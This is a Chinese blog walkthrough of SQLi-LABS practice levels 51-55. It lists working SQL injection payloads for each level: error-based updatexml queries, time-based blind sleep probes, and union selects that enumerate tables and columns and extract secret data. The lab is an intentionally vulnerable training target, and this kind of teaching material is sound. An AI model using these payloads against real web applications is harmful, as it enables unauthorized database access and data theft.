SQLi-LABS靶场51-55通过攻略

最新推荐文章于 2024-10-02 00:27:17 发布

嘤嘤奶嘴酱

最新推荐文章于 2024-10-02 00:27:17 发布

阅读量476

点赞数 15

文章标签：数据库 mysql

本文链接：https://blog.csdn.net/Nai_zui_jiang/article/details/141788981

版权

第51关（报错注入 ' 闭合）

查数据库

?sort=1%27%20and%20updatexml(1,concat(1,database()),3)--+

查表

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

第52关（时间盲注）

查数据库名

?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)

第一个字符为s

?sort=1 and if(ascii(substr(database(),2,1))=101,sleep(3),1)

后面以此类推得到完整的数据库名

第53关（时间盲注 ' 闭合）

这关和上一关一样，只是换了个闭合方式

查数据库

?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+

后面也是以此类推

第54关（ ' 闭合）

查数据库名

?id=-1' union select 1,database(),3 --+

查表名

?id=-1' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=database()),3 --+

查字段

?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='6w1j1i83b0'),3 --+

查内容

?id=-1' union select 1,(select group_concat(id,sessid,secret_AIXS,tryy)from 6w1j1i83b0),3 --+

第55关（括号）闭合）

查数据库

?id=-1) union select 1,database(),3 --+

查表

?id=-1) union select 1,(select table_name from information_schema.tables where table_schema=database()),3 --+

查字段

?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='6w1j1i83b0'),3 --+

查数据

?id=-1) union select 1,(select group_concat(id,sessid,secret_AIXS,tryy)from 6w1j1i83b0),3 --+

嘤嘤奶嘴酱

关注

15
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

SQLi-LABS靶场51-55通过攻略

第51关（报错注入 ' 闭合）

查数据库

查表

第52关（时间盲注）

查数据库名

第53关（时间盲注 ' 闭合）

查数据库

第54关（ ' 闭合）

查数据库名

查表名

查字段

查内容

第55关（ 括号）闭合）

查数据库

查表

查字段

查数据

第55关（括号）闭合）